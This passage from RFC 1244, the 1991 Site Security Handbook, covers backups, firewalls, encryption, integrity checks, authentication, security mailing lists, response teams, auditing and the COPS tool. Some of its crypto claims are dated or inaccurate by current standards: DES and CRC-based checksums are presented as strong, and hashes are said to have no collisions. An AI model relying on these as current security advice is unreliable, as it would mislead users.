unplugged) against the cost of upgrading to the + new software (possibly breaking third-party software, etc.). + Bug fixes from the vendor should be weighed in a similar + fashion, with the added note that "security" fixes from a + vendor usually address fairly serious security problems. + + Other bug fixes, received via network mailing lists and the + like, should usually be installed, but not without careful + examination. Never install a bug fix unless you're sure you + know what the consequences of the fix are - there's always the + possibility that an intruder has suggested a "fix" which + actually gives him or her access to your system. + + 3.8.2.3 Recovery Procedures - Backups + + It is impossible to overemphasize the need for a good backup + strategy. File system backups not only protect you in the + event of hardware failure or accidental deletions, but they + also protect you against unauthorized changes made by an + intruder. Without a copy of your data the way it's "supposed" + to be, it can be difficult to undo something an attacker has + done. + + Backups, especially if run daily, can also be useful in + providing a history of an intruder's activities. Looking + through old backups can establish when your system was first + penetrated. Intruders may leave files around which, although + deleted later, are captured on the backup tapes. Backups can + also be used to document an intruder's activities to law + enforcement agencies if necessary. + + A good backup strategy will dump the entire system to tape at + least once a month. Partial (or "incremental") dumps should be + + + +Site Security Policy Handbook Working Group [Page 33] + +RFC 1244 Site Security Handbook July 1991 + + + done at least twice a week, and ideally they should be done + daily. Commands specifically designed for performing file + system backups (e.g., UNIX "dump" or VMS "BACKUP") should be + used in preference to other file copying commands, since these + tools are designed with the express intent of restoring a + system to a known state. + + 3.8.2.4 Problem Reporting Procedures + + As with users, system administrators should have a defined + procedure for reporting security problems. In large + installations, this is often done by creating an electronic + mail alias which contains the names of all system + administrators in the organization. Other methods include + setting up some sort of response team similar to the CERT, or + establishing a "hotline" serviced by an existing support group. + +3.9 Resources to Prevent Security Breaches + + This section discusses software, hardware, and procedural resources + that can be used to support your site security policy. + + 3.9.1 Network Connections and Firewalls + + A "firewall" is put in place in a building to provide a point of + resistance to the entry of flames into another area. Similarly, a + secretary's desk and reception area provides a point of + controlling access to other office spaces. This same technique + can be applied to a computer site, particularly as it pertains to + network connections. + + Some sites will be connected only to other sites within the same + organization and will not have the ability to connect to other + networks. Sites such as these are less susceptible to threats + from outside their own organization, although intrusions may still + occur via paths such as dial-up modems. On the other hand, many + other organizations will be connected to other sites via much + larger networks, such as the Internet. These sites are + susceptible to the entire range of threats associated with a + networked environment. + + The risks of connecting to outside networks must be weighed + against the benefits. It may be desirable to limit connection to + outside networks to those hosts which do not store sensitive + material, keeping "vital" machines (such as those which maintain + company payroll or inventory systems) isolated. If there is a + need to participate in a Wide Area Network (WAN), consider + restricting all access to your local network through a single + + + +Site Security Policy Handbook Working Group [Page 34] + +RFC 1244 Site Security Handbook July 1991 + + + system. That is, all access to or from your own local network + must be made through a single host computer that acts as a + firewall between you and the outside world. This firewall system + should be rigorously controlled and password protected, and + external users accessing it should also be constrained by + restricting the functionality available to remote users. By using + this approach, your site could relax some of the internal security + controls on your local net, but still be afforded the protection + of a rigorously controlled host front end. + + Note that even with a firewall system, compromise of the firewall + could result in compromise of the network behind the firewall. + Work has been done in some areas to construct a firewall which + even when compromised, still protects the local network [6, + CHESWICK]. + + 3.9.2 Confidentiality + + Confidentiality, the act of keeping things hidden or secret, is + one of the primary goals of computer security practitioners. + Several mechanisms are provided by most modern operating systems + to enable users to control the dissemination of information. + Depending upon where you work, you may have a site where + everything is protected, or a site where all information is + usually regarded as public, or something in-between. Most sites + lean toward the in-between, at least until some penetration has + occurred. + + Generally, there are three instances in which information is + vulnerable to disclosure: when the information is stored on a + computer system, when the information is in transit to another + system (on the network), and when the information is stored on + backup tapes. + + The first of these cases is controlled by file permissions, access + control lists, and other similar mechanisms. The last can be + controlled by restricting access to the backup tapes (by locking + them in a safe, for example). All three cases can be helped by + using encryption mechanisms. + + 3.9.2.1 Encryption (hardware and software) + + Encryption is the process of taking information that exists in + some readable form and converting it into a non-readable form. + There are several types of commercially available encryption + packages in both hardware and software forms. Hardware + encryption engines have the advantage that they are much faster + than the software equivalent, yet because they are faster, they + + + +Site Security Policy Handbook Working Group [Page 35] + +RFC 1244 Site Security Handbook July 1991 + + + are of greater potential benefit to an attacker who wants to + execute a brute-force attack on your encrypted information. + + The advantage of using encryption is that, even if other access + control mechanisms (passwords, file permissions, etc.) are + compromised by an intruder, the data is still unusable. + Naturally, encryption keys and the like should be protected at + least as well as account passwords. + + Information in transit (over a network) may be vulnerable to + interception as well. Several solutions to this exist, ranging + from simply encrypting files before transferring them (end-to- + end encryption) to special network hardware which encrypts + everything it sends without user intervention (secure links). + The Internet as a whole does not use secure links, thus end- + to-end encryption must be used if encryption is desired across + the Internet. + + 3.9.2.1.1 Data Encryption Standard (DES) + + DES is perhaps the most widely used data encryption + mechanism today. Many hardware and software implementations + exist, and some commercial computers are provided with a + software version. DES transforms plain text information + into encrypted data (or ciphertext) by means of a special + algorithm and "seed" value called a key. So long as the key + is retained (or remembered) by the original user, the + ciphertext can be restored to the original plain text. + + One of the pitfalls of all encryption systems is the need to + remember the key under which a thing was encrypted (this is + not unlike the password problem discussed elsewhere in this + document). If the key is written down, it becomes less + secure. If forgotten, there is little (if any) hope of + recovering the original data. + + Most UNIX systems provide a DES command that enables a user + to encrypt data using the DES algorithm. + + 3.9.2.1.2 Crypt + + Similar to the DES command, the UNIX "crypt" command allows + a user to encrypt data. Unfortunately, the algorithm used + by "crypt" is very insecure (based on the World War II + "Enigma" device), and files encrypted with this command can + be decrypted easily in a matter of a few hours. Generally, + use of the "crypt" command should be avoided for any but the + most trivial encryption tasks. + + + +Site Security Policy Handbook Working Group [Page 36] + +RFC 1244 Site Security Handbook July 1991 + + + 3.9.2.2 Privacy Enhanced Mail + + Electronic mail normally transits the network in the clear + (i.e., anyone can read it). This is obviously not the optimal + solution. Privacy enhanced mail provides a means to + automatically encrypt electronic mail messages so that a person + eavesdropping at a mail distribution node is not (easily) + capable of reading them. Several privacy enhanced mail + packages are currently being developed and deployed on the + Internet. + + The Internet Activities Board Privacy Task Force has defined a + draft standard, elective protocol for use in implementing + privacy enhanced mail. This protocol is defined in RFCs 1113, + 1114, and 1115 [7,8,9]. Please refer to the current edition of + the "IAB Official Protocol Standards" (currently, RFC 1200 + [21]) for the standardization state and status of these + protocols. + + 3.9.3 Origin Authentication + + We mostly take it on faith that the header of an electronic mail + message truly indicates the originator of a message. However, it + iseasy to "spoof", or forge the source of a mail message. Origin + authentication provides a means to be certain of the originator of + a message or other object in the same way that a Notary Public + assures a signature on a legal document. This is done by means of + a "Public Key" cryptosystem. + + A public key cryptosystem differs from a private key cryptosystem + in several ways. First, a public key system uses two keys, a + Public Key that anyone can use (hence the name) and a Private Key + that only the originator of a message uses. The originator uses + the private key to encrypt the message (as in DES). The receiver, + who has obtained the public key for the originator, may then + decrypt the message. + + In this scheme, the public key is used to authenticate the + originator's use of his or her private key, and hence the identity + of the originator is more rigorously proven. The most widely + known implementation of a public key cryptosystem is the RSA + system [26]. The Internet standard for privacy enhanced mail + makes use of the RSA system. + + 3.9.4 Information Integrity + + Information integrity refers to the state of information such that + it is complete, correct, and unchanged from the last time in which + + + +Site Security Policy Handbook Working Group [Page 37] + +RFC 1244 Site Security Handbook July 1991 + + + it was verified to be in an "integral" state. The value of + information integrity to a site will vary. For example, it is + more important for military and government installations to + prevent the "disclosure" of classified information, whether it is + right or wrong. A bank, on the other hand, is far more concerned + with whether the account information maintained for its customers + is complete and accurate. + + Numerous computer system mechanisms, as well as procedural + controls, have an influence on the integrity of system + information. Traditional access control mechanisms maintain + controls over who can access system information. These mechanisms + alone are not sufficient in some cases to provide the degree of + integrity required. Some other mechanisms are briefly discussed + below. + + It should be noted that there are other aspects to maintaining + system integrity besides these mechanisms, such as two-person + controls, and integrity validation procedures. These are beyond + the scope of this document. + + 3.9.4.1 Checksums + + Easily the simplest mechanism, a simple checksum routine can + compute a value for a system file and compare it with the last + known value. If the two are equal, the file is probably + unchanged. If not, the file has been changed by some unknown + means. + + Though it is the easiest to implement, the checksum scheme + suffers from a serious failing in that it is not very + sophisticated and a determined attacker could easily add enough + characters to the file to eventually obtain the correct value. + + A specific type of checksum, called a CRC checksum, is + considerably more robust than a simple checksum. It is only + slightly more difficult to implement and provides a better + degree of catching errors. It too, however, suffers from the + possibility of compromise by an attacker. + + Checksums may be used to detect the altering of information. + However, they do not actively guard against changes being made. + For this, other mechanisms such as access controls and + encryption should be used. + + + + + + + +Site Security Policy Handbook Working Group [Page 38] + +RFC 1244 Site Security Handbook July 1991 + + + 3.9.4.2 Cryptographic Checksums + + Cryptographic checksums (also called cryptosealing) involve + breaking a file up into smaller chunks, calculating a (CRC) + checksum for each chunk, and adding the CRCs together. + Depending upon the exact algorithm used, this can result in a + nearly unbreakable method of determining whether a file has + been changed. This mechanism suffers from the fact that it is + sometimes computationally intensive and may be prohibitive + except in cases where the utmost integrity protection is + desired. + + Another related mechanism, called a one-way hash function (or a + Manipulation Detection Code (MDC)) can also be used to uniquely + identify a file. The idea behind these functions is that no + two inputs can produce the same output, thus a modified file + will not have the same hash value. One-way hash functions can + be implemented efficiently on a wide variety of systems, making + unbreakable integrity checks possible. (Snefru, a one-way hash + function available via USENET as well as the Internet is just + one example of an efficient one-way hash function.) [10] + + 3.9.5 Limiting Network Access + + The dominant network protocols in use on the Internet, IP (RFC + 791) [11], TCP (RFC 793) [12], and UDP (RFC 768) [13], carry + certain control information which can be used to restrict access + to certain hosts or networks within an organization. + + The IP packet header contains the network addresses of both the + sender and recipient of the packet. Further, the TCP and UDP + protocols provide the notion of a "port", which identifies the + endpoint (usually a network server) of a communications path. In + some instances, it may be desirable to deny access to a specific + TCP or UDP port, or even to certain hosts and networks altogether. + + 3.9.5.1 Gateway Routing Tables + + One of the simplest approaches to preventing unwanted network + connections is to simply remove certain networks from a + gateway's routing tables. This makes it "impossible" for a + host to send packets to these networks. (Most protocols + require bidirectional packet flow even for unidirectional data + flow, thus breaking one side of the route is usually + sufficient.) + + This approach is commonly taken in "firewall" systems by + preventing the firewall from advertising local routes to the + + + +Site Security Policy Handbook Working Group [Page 39] + +RFC 1244 Site Security Handbook July 1991 + + + outside world. The approach is deficient in that it often + prevents "too much" (e.g., in order to prevent access to one + system on the network, access to all systems on the network is + disabled). + + 3.9.5.2 Router Packet Filtering + + Many commercially available gateway systems (more correctly + called routers) provide the ability to filter packets based not + only on sources or destinations, but also on source-destination + combinations. This mechanism can be used to deny access to a + specific host, network, or subnet from any other host, network, + or subnet. + + Gateway systems from some vendors (e.g., cisco Systems) support + an even more complex scheme, allowing finer control over source + and destination addresses. Via the use of address masks, one + can deny access to all but one host on a particular network. + The cisco Systems also allow packet screening based on IP + protocol type and TCP or UDP port numbers [14]. + + This can also be circumvented by "source routing" packets + destined for the "secret" network. Source routed packets may + be filtered out by gateways, but this may restrict other + legitimate activities, such as diagnosing routing problems. + + 3.9.6 Authentication Systems + + Authentication refers to the process of proving a claimed identity + to the satisfaction of some permission-granting authority. + Authentication systems are hardware, software, or procedural + mechanisms that enable a user to obtain access to computing + resources. At the simplest level, the system administrator who + adds new user accounts to the system is part of the system + authentication mechanism. At the other end of the spectrum, + fingerprint readers or retinal scanners provide a very high-tech + solution to establishing a potential user's identity. Without + establishing and proving a user's identity prior to establishing a + session, your site's computers are vulnerable to any sort of + attack. + + Typically, a user authenticates himself or herself to the system + by entering a password in response to a prompt. + Challenge/Response mechanisms improve upon passwords by prompting + the user for some piece of information shared by both the computer + and the user (such as mother's maiden name, etc.). + + + + + +Site Security Policy Handbook Working Group [Page 40] + +RFC 1244 Site Security Handbook July 1991 + + + 3.9.6.1 Kerberos + + Kerberos, named after the dog who in mythology is said to stand + at the gates of Hades, is a collection of software used in a + large network to establish a user's claimed identity. + Developed at the Massachusetts Institute of Technology (MIT), + it uses a combination of encryption and distributed databases + so that a user at a campus facility can login and start a + session from any computer located on the campus. This has + clear advantages in certain environments where there are a + large number of potential users who may establish a connection + from any one of a large number of workstations. Some vendors + are now incorporating Kerberos into their systems. + + It should be noted that while Kerberos makes several advances + in the area of authentication, some security weaknesses in the + protocol still remain [15]. + + 3.9.6.2 Smart Cards + + Several systems use "smart cards" (a small calculator-like + device) to help authenticate users. These systems depend on + the user having an object in their possession. One such system + involves a new password procedure that require a user to enter + a value obtained from a "smart card" when asked for a password + by the computer. Typically, the host machine will give the + user some piece of information that is entered into the + keyboard of the smart card. The smart card will display a + response which must then be entered into the computer before + the session will be established. Another such system involves + a smart card which displays a number which changes over time, + but which is synchronized with the authentication software on + the computer. + + This is a better way of dealing with authentication than with + the traditional password approach. On the other hand, some say + it's inconvenient to carry the smart card. Start-up costs are + likely to be high as well. + + 3.9.7 Books, Lists, and Informational Sources + + There are many good sources for information regarding computer + security. The annotated bibliography at the end of this document + can provide you with a good start. In addition, information can + be obtained from a variety of other sources, some of which are + described in this section. + + + + + +Site Security Policy Handbook Working Group [Page 41] + +RFC 1244 Site Security Handbook July 1991 + + + 3.9.7.1 Security Mailing Lists + + The UNIX Security mailing list exists to notify system + administrators of security problems before they become common + knowledge, and to provide security enhancement information. It + is a restricted-access list, open only to people who can be + verified as being principal systems people at a site. Requests + to join the list must be sent by either the site contact listed + in the Defense Data Network's Network Information Center's (DDN + NIC) WHOIS database, or from the "root" account on one of the + major site machines. You must include the destination address + you want on the list, an indication of whether you want to be + on the mail reflector list or receive weekly digests, the + electronic mail address and voice telephone number of the site + contact if it isn't you, and the name, address, and telephone + number of your organization. This information should be sent + to SECURITY-REQUEST@CPD.COM. + + The RISKS digest is a component of the ACM Committee on + Computers and Public Policy, moderated by Peter G. Neumann. It + is a discussion forum on risks to the public in computers and + related systems, and along with discussing computer security + and privacy issues, has discussed such subjects as the Stark + incident, the shooting down of the Iranian airliner in the + Persian Gulf (as it relates to the computerized weapons + systems), problems in air and railroad traffic control systems, + software engineering, and so on. To join the mailing list, + send a message to RISKS-REQUEST@CSL.SRI.COM. This list is also + available in the USENET newsgroup "comp.risks". + + The VIRUS-L list is a forum for the discussion of computer + virus experiences, protection software, and related topics. + The list is open to the public, and is implemented as a + moderated digest. Most of the information is related to + personal computers, although some of it may be applicable to + larger systems. To subscribe, send the line: + + SUB VIRUS-L your full name + + to the address LISTSERV%LEHIIBM1.BITNET@MITVMA.MIT.EDU. This + list is also available via the USENET newsgroup "comp.virus". + + The Computer Underground Digest "is an open forum dedicated to + sharing information among computerists and to the presentation + and debate of diverse views." While not directly a security + list, it does contain discussions about privacy and other + security related topics. The list can be read on USENET as + alt.society.cu-digest, or to join the mailing list, send mail + + + +Site Security Policy Handbook Working Group [Page 42] + +RFC 1244 Site Security Handbook July 1991 + + + to Gordon Myer (TK0JUT2%NIU.bitnet@mitvma.mit.edu). + Submissions may be mailed to: cud@chinacat.unicom.com. + + 3.9.7.2 Networking Mailing Lists + + The TCP-IP mailing list is intended to act as a discussion + forum for developers and maintainers of implementations of the + TCP/IP protocol suite. It also discusses network-related + security problems when they involve programs providing network + services, such as "Sendmail". To join the TCP-IP list, send a + message to TCP-IP-REQUEST@NISC.SRI.COM. This list is also + available in the USENET newsgroup "comp.protocols.tcp-ip". + + SUN-NETS is a discussion list for items pertaining to + networking on Sun systems. Much of the discussion is related + to NFS, NIS (formally Yellow Pages), and name servers. To + subscribe, send a message to SUN-NETS-REQUEST@UMIACS.UMD.EDU. + + The USENET groups misc.security and alt.security also discuss + security issues. misc.security is a moderated group and also + includes discussions of physical security and locks. + alt.security is unmoderated. + + 3.9.7.3 Response Teams + + Several organizations have formed special groups of people to + deal with computer security problems. These teams collect + information about possible security holes and disseminate it to + the proper people, track intruders, and assist in recovery from + security violations. The teams typically have both electronic + mail distribution lists as well as a special telephone number + which can be called for information or to report a problem. + Many of these teams are members of the CERT System, which is + coordinated by the National Institute of Standards and + Technology (NIST), and exists to facilitate the exchange of + information between the various teams. + + 3.9.7.3.1 DARPA Computer Emergency Response Team + + The Computer Emergency Response Team/Coordination Center + (CERT/CC) was established in December 1988 by the Defense + Advanced Research Projects Agency (DARPA) to address + computer security concerns of research users of the + Internet. It is operated by the Software Engineering + Institute (SEI) at Carnegie-Mellon University (CMU). The + CERT can immediately confer with experts to diagnose and + solve security problems, and also establish and maintain + communications with the affected computer users and + + + +Site Security Policy Handbook Working Group [Page 43] + +RFC 1244 Site Security Handbook July 1991 + + + government authorities as appropriate. + + The CERT/CC serves as a clearing house for the + identification and repair of security vulnerabilities, + informal assessments of existing systems, improvement of + emergency response capability, and both vendor and user + security awareness. In addition, the team works with + vendors of various systems in order to coordinate the fixes + for security problems. + + The CERT/CC sends out security advisories to the CERT- + ADVISORY mailing list whenever appropriate. They also + operate a 24-hour hotline that can be called to report + security problems (e.g., someone breaking into your system), + as well as to obtain current (and accurate) information + about rumored security problems. + + To join the CERT-ADVISORY mailing list, send a message to + CERT@CERT.SEI.CMU.EDU and ask to be added to the mailing + list. The material sent to this list also appears in the + USENET newsgroup "comp.security.announce". Past advisories + are available for anonymous FTP from the host + CERT.SEI.CMU.EDU. The 24-hour hotline number is (412) 268- + 7090. + + The CERT/CC also maintains a CERT-TOOLS list to encourage + the exchange of information on tools and techniques that + increase the secure operation of Internet systems. The + CERT/CC does not review or endorse the tools described on + the list. To subscribe, send a message to CERT-TOOLS- + REQUEST@CERT.SEI.CMU.EDU and ask to be added to the mailing + list. + + The CERT/CC maintains other generally useful security + information for anonymous FTP from CERT.SEI.CMU.EDU. Get + the README file for a list of what is available. + + For more information, contact: + + CERT + Software Engineering Institute + Carnegie Mellon University + Pittsburgh, PA 15213-3890 + + (412) 268-7090 + cert@cert.sei.cmu.edu. + + + + + +Site Security Policy Handbook Working Group [Page 44] + +RFC 1244 Site Security Handbook July 1991 + + + 3.9.7.3.2 DDN Security Coordination Center + + For DDN users, the Security Coordination Center (SCC) serves + a function similar to CERT. The SCC is the DDN's clearing- + house for host/user security problems and fixes, and works + with the DDN Network Security Officer. The SCC also + distributes the DDN Security Bulletin, which communicates + information on network and host security exposures, fixes, + and concerns to security and management personnel at DDN + facilities. It is available online, via kermit or anonymous + FTP, from the host NIC.DDN.MIL, in SCC:DDN-SECURITY-yy- + nn.TXT (where "yy" is the year and "nn" is the bulletin + number). The SCC provides immediate assistance with DDN- + related host security problems; call (800) 235-3155 (6:00 + a.m. to 5:00 p.m. Pacific Time) or send email to + SCC@NIC.DDN.MIL. For 24 hour coverage, call the MILNET + Trouble Desk (800) 451-7413 or AUTOVON 231-1713. + + 3.9.7.3.3 NIST Computer Security Resource and Response Center + + The National Institute of Standards and Technology (NIST) + has responsibility within the U.S. Federal Government for + computer science and technology activities. NIST has played + a strong role in organizing the CERT System and is now + serving as the CERT System Secretariat. NIST also operates + a Computer Security Resource and Response Center (CSRC) to + provide help and information regarding computer security + events and incidents, as well as to raise awareness about + computer security vulnerabilities. + + The CSRC team operates a 24-hour hotline, at (301) 975-5200. + For individuals with access to the Internet, on-line + publications and computer security information can be + obtained via anonymous FTP from the host CSRC.NCSL.NIST.GOV + (129.6.48.87). NIST also operates a personal computer + bulletin board that contains information regarding computer + viruses as well as other aspects of computer security. To + access this board, set your modem to 300/1200/2400 BPS, 1 + stop bit, no parity, and 8-bit characters, and call (301) + 948-5717. All users are given full access to the board + immediately upon registering. + + NIST has produced several special publications related to + computer security and computer viruses in particular; some + of these publications are downloadable. For further + information, contact NIST at the following address: + + + + + +Site Security Policy Handbook Working Group [Page 45] + +RFC 1244 Site Security Handbook July 1991 + + + Computer Security Resource and Response Center + A-216 Technology + Gaithersburg, MD 20899 + Telephone: (301) 975-3359 + Electronic Mail: CSRC@nist.gov + + 3.9.7.3.4 DOE Computer Incident Advisory Capability (CIAC) + + CIAC is the Department of Energy's (DOE's) Computer Incident + Advisory Capability. CIAC is a four-person team of computer + scientists from Lawrence Livermore National Laboratory + (LLNL) charged with the primary responsibility of assisting + DOE sites faced with computer security incidents (e.g., + intruder attacks, virus infections, worm attacks, etc.). + This capability is available to DOE sites on a 24-hour-a-day + basis. + + CIAC was formed to provide a centralized response capability + (including technical assistance), to keep sites informed of + current events, to deal proactively with computer security + issues, and to maintain liaisons with other response teams + and agencies. CIAC's charter is to assist sites (through + direct technical assistance, providing information, or + referring inquiries to other technical experts), serve as a + clearinghouse for information about threats/known + incidents/vulnerabilities, develop guidelines for incident + handling, develop software for responding to + events/incidents, analyze events and trends, conduct + training and awareness activities, and alert and advise + sites about vulnerabilities and potential attacks. + + CIAC's business hours phone number is (415) 422-8193 or FTS + 532-8193. CIAC's e-mail address is CIAC@TIGER.LLNL.GOV. + + 3.9.7.3.5 NASA Ames Computer Network Security Response Team + + The Computer Network Security Response Team (CNSRT) is NASA + Ames Research Center's local version of the DARPA CERT. + Formed in August of 1989, the team has a constituency that + is primarily Ames users, but it is also involved in + assisting other NASA Centers and federal agencies. CNSRT + maintains liaisons with the DOE's CIAC team and the DARPA + CERT. It is also a charter member of the CERT System. The + team may be reached by 24 hour pager at (415) 694-0571, or + by electronic mail to CNSRT@AMES.ARC.NASA.GOV. + + + + + + +Site Security Policy Handbook Working Group [Page 46] + +RFC 1244 Site Security Handbook July 1991 + + + 3.9.7.4 DDN Management Bulletins + + The DDN Management Bulletin is distributed electronically by + the DDN NIC under contract to the Defense Communications Agency + (DCA). It is a means of communicating official policy, + procedures, and other information of concern to management + personnel at DDN facilities. + + The DDN Security Bulletin is distributed electronically by the + DDN SCC, also under contract to DCA, as a means of + communicating information on network and host security + exposures, fixes, and concerns to security and management + personnel at DDN facilities. + + Anyone may join the mailing lists for these two bulletins by + sending a message to NIC@NIC.DDN.MIL and asking to be placed on + the mailing lists. These messages are also posted to the + USENET newsgroup "ddn.mgt-bulletin". For additional + information, see section 8.7. + + 3.9.7.5 System Administration List + + The SYSADM-LIST is a list pertaining exclusively to UNIX system + administration. Mail requests to be added to the list to + SYSADM-LIST-REQUEST@SYSADMIN.COM. + + 3.9.7.6 Vendor Specific System Lists + + The SUN-SPOTS and SUN-MANAGERS lists are discussion groups for + users and administrators of systems supplied by Sun + Microsystems. SUN-SPOTS is a fairly general list, discussing + everything from hardware configurations to simple UNIX + questions. To subscribe, send a message to SUN-SPOTS- + REQUEST@RICE.EDU. This list is also available in the USENET + newsgroup "comp.sys.sun". SUN-MANAGERS is a discussion list + for Sun system administrators and covers all aspects of Sun + system administration. To subscribe, send a message to SUN- + MANAGERS-REQUEST@EECS.NWU.EDU. + + The APOLLO list discusses the HP/Apollo system and its + software. To subscribe, send a message to APOLLO- + REQUEST@UMIX.CC.UMICH.EDU. APOLLO-L is a similar list which + can be subscribed to by sending + + SUB APOLLO-L your full name + + to LISTSERV%UMRVMB.BITNET@VM1.NODAK.EDU. + + + + +Site Security Policy Handbook Working Group [Page 47] + +RFC 1244 Site Security Handbook July 1991 + + + HPMINI-L pertains to the Hewlett-Packard 9000 series and HP/UX + operating system. To subscribe, send + + SUB HPMINI-L your full name + + to LISTSERV%UAFSYSB.BITNET@VM1.NODAK.EDU. + + INFO-IBMPC discusses IBM PCs and compatibles, as well as MS- + DOS. To subscribe, send a note to INFO-IBMPC-REQUEST@WSMR- + SIMTEL20.ARMY.MIL. + + There are numerous other mailing lists for nearly every popular + computer or workstation in use today. For a complete list, + obtain the file "netinfo/interest-groups" via anonymous FTP + from the host FTP.NISC.SRI.COM. + + 3.9.7.7 Professional Societies and Journals + + The IEEE Technical Committee on Security & Privacy publishes a + quarterly magazine, "CIPHER". + + IEEE Computer Society, + 1730 Massachusetts Ave. N.W. + Washington, DC 2036-1903 + + The ACM SigSAC (Special Interest Group on Security, Audit, and + Controls) publishes a quarterly magazine, "SIGSAC Review". + + Association for Computing Machinery + 11 West 42nd St. + New York, N.Y. 10036 + + The Information Systems Security Association publishes a + quarterly magazine called "ISSA Access". + + Information Systems Security Association + P.O. Box 9457 + Newport Beach, CA 92658 + + "Computers and Security" is an "international journal for the + professional involved with computer security, audit and + control, and data integrity." + + + + + + + + + +Site Security Policy Handbook Working Group [Page 48] + +RFC 1244 Site Security Handbook July 1991 + + + $266/year, 8 issues (1990) + + Elsevier Advanced Technology + Journal Information Center + 655 Avenue of the Americas + New York, NY 10010 + + The "Data Security Letter" is published "to help data security + professionals by providing inside information and knowledgable + analysis of developments in computer and communications + security." + + $690/year, 9 issues (1990) + + Data Security Letter + P.O. Box 1593 + Palo Alto, CA 94302 + + 3.9.8 Problem Reporting Tools + + 3.9.8.1 Auditing + + Auditing is an important tool that can be used to enhance the + security of your installation. Not only does it give you a + means of identifying who has accessed your system (and may have + done something to it) but it also gives you an indication of + how your system is being used (or abused) by authorized users + and attackers alike. In addition, the audit trail + traditionally kept by computer systems can become an invaluable + piece of evidence should your system be penetrated. + + 3.9.8.1.1 Verify Security + + An audit trail shows how the system is being used from day + to day. Depending upon how your site audit log is + configured, your log files should show a range of access + attempts that can show what normal system usage should look + like. Deviation from that normal usage could be the result + of penetration from an outside source using an old or stale + user account. Observing a deviation in logins, for example, + could be your first indication that something unusual is + happening. + + 3.9.8.1.2 Verify Software Configurations + + One of the ruses used by attackers to gain access to a + system is by the insertion of a so-called Trojan Horse + program. A Trojan Horse program can be a program that does + + + +Site Security Policy Handbook Working Group [Page 49] + +RFC 1244 Site Security Handbook July 1991 + + + something useful, or merely something interesting. It + always does something unexpected, like steal passwords or + copy files without your knowledge [25]. Imagine a Trojan + login program that prompts for username and password in the + usual way, but also writes that information to a special + file that the attacker can come back and read at will. + Imagine a Trojan Editor program that, despite the file + permissions you have given your files, makes copies of + everything in your directory space without you knowing about + it. + + This points out the need for configuration management of the + software that runs on a system, not as it is being + developed, but as it is in actual operation. Techniques for + doing this range from checking each command every time it is + executed against some criterion (such as a cryptoseal, + described above) or merely checking the date and time stamp + of the executable. Another technique might be to check each + command in batch mode at midnight. + + 3.9.8.2 Tools + + COPS is a security tool for system administrators that checks + for numerous common security problems on UNIX systems [27]. + COPS is a collection of shell scripts and C programs that can + easily be run on almost any UNIX variant. Among other things, + it checks the following items and sends the results to the + system administrator: + + - Checks "/dev/kmem" and other devices for world + read/writability. + + - Checks special or important files and directories for + "bad" modes (world writable, etc.). + + - Checks for easily-guessed passwords. + + - Checks for duplicate user ids, invalid fields in the + password file, etc.. + + - Checks for duplicate group ids, invalid fields in the + group file, etc.. + + - Checks all users' home directories and their ".cshrc", + ".login", ".profile", and ".rhosts" files for security + problems. + + - Checks all commands in the "/etc/rc" files and "cron" + + + +Site Security Policy Handbook Working Group [Page 50] + +RFC 1244 Site Security Handbook July 1991 + + + files for world writability. + + - Checks for bad "root" paths, NFS file systems exported + to the world, etc.. + + - Includes an expert system that checks to see if a given + user (usually "root") can be compromised, given that + certain rules are true. + + - Checks for changes in the setuid status of programs on the + system. + + The COPS package is available from the "comp.sources.unix" + archive on "ftp.uu.net", and also from the UNIX-SW repository + on the MILNET host "wsmr-simtel20.army.mil". + + 3.9.9 Communication Among Administrators + + 3.9.9.1 Secure Operating Systems + + The following list of products and vendors is adapted from the + National Computer Security Center's (NCSC) Evaluated Products + List. They represent those companies who have either received + an evaluation from the NCSC or are in the process of a product + evaluation. This list is not complete, but it is + representative of those operating systems and add on components + available in the commercial marketplace. + + For a more detailed listing of the current products appearing + in the NCSC EPL, contact the NCSC at: + + National Computer Security Center + 9800 Savage Road + Fort George G. Meade, MD 20755-6000 + (301) 859-4458 + + + + + + + + + + + + + + + + +Site Security Policy Handbook Working Group [Page 51] + +RFC 1244 Site Security Handbook July 1991 + + + Version Evaluation +Evaluated Product Vendor Evaluated Class +----------------------------------------------------------------------- +Secure Communications Honeywell Information 2.1 A1 +Processor (SCOMP) Systems, Inc. + +Multics Honeywell Information MR11.0 B2 + Systems, Inc. + +System V/MLS 1.1.2 on UNIX AT&T 1.1.2 B1 +System V 3.1.1 on AT&T 3B2/500and 3B2/600 + +OS 1100 Unisys Corp. Security B1 + Release 1 + +MPE V/E Hewlett-Packard Computer G.03.04 C2 + Systems Division + +AOS/VS on MV/ECLIPSE series Data General Corp. 7.60 C2 + +VM/SP or VM/SP HPO with CMS, IBM Corp. 5 C2 +RACF, DIRMAINT, VMTAPE-MS, +ISPF + +MVS/XA with RACF IBM Corp. 2.2,2.3 C2 + +AX/VMS Digital Equipment Corp. 4.3 C2 + +NOS Control Data Corp. NOS + Security C2 + Eval Product + +TOP SECRET CGA Software Products 3.0/163 C2 + Group, Inc. + +Access Control Facility 2 SKK, Inc. 3.1.3 C2 + +UTX/32S Gould, Inc. Computer 1.0 C2 + Systems Division + +A Series MCP/AS with Unisys Corp. 3.7 C2 +InfoGuard Security +Enhancements + +Primos Prime Computer, Inc. 21.0.1DODC2A C2 +Resource Access Control IBM Corp. 1.5 C1 +Facility (RACF) + + + + +Site Security Policy Handbook Working Group [Page 52] + +RFC 1244 Site Security Handbook July 1991 + + + Version Candidate +Candidate Product Vendor Evaluated Class +----------------------------------------------------------------------- +Boeing MLS LAN Boeing Aerospace A1 M1 + +Trusted XENIX Trusted Information + Systems, Inc. B2 + +VSLAN VERDIX Corp. B2 + +System V/MLS AT&T B1 + +VM/SP with RACF IBM Corp. 5/1.8.2 C2 +Wang SVS/OS with CAP Wang Laboratories, Inc. 1.0 C2 + + + 3.9.9.2 Obtaining Fixes for Known Problems + + It goes without saying that computer systems have bugs. Even + operating systems, upon which we depend for protection of our + data, have bugs. And since there are bugs, things can be + broken, both maliciously and accidentally. It is important + that whenever bugs are discovered, a should fix be identified + and implemented as soon as possible. This should minimize any + exposure caused by the bug in the first place. + + A corollary to the bug problem is: from whom do I obtain the + fixes? Most systems have some support from the manufacturer or + supplier. Fixes coming from that source tend to be implemented + quickly after receipt. Fixes for some problems are often + posted on the network and are left to the system administrators + to incorporate as they can. The problem is that one wants to + have faith that the fix will close the hole and not introduce + any others. We will tend to trust that the manufacturer's + fixes are better than those that are posted on the net. + + 3.9.9.3 Sun Customer Warning System + + Sun Microsystems has established a Customer Warning System + (CWS) for handling security incidents. This is a formal + process which includes: + + - Having a well advertised point of contact in Sun + for reporting security problems. + - Pro-actively alerting customers of worms, viruses, + or 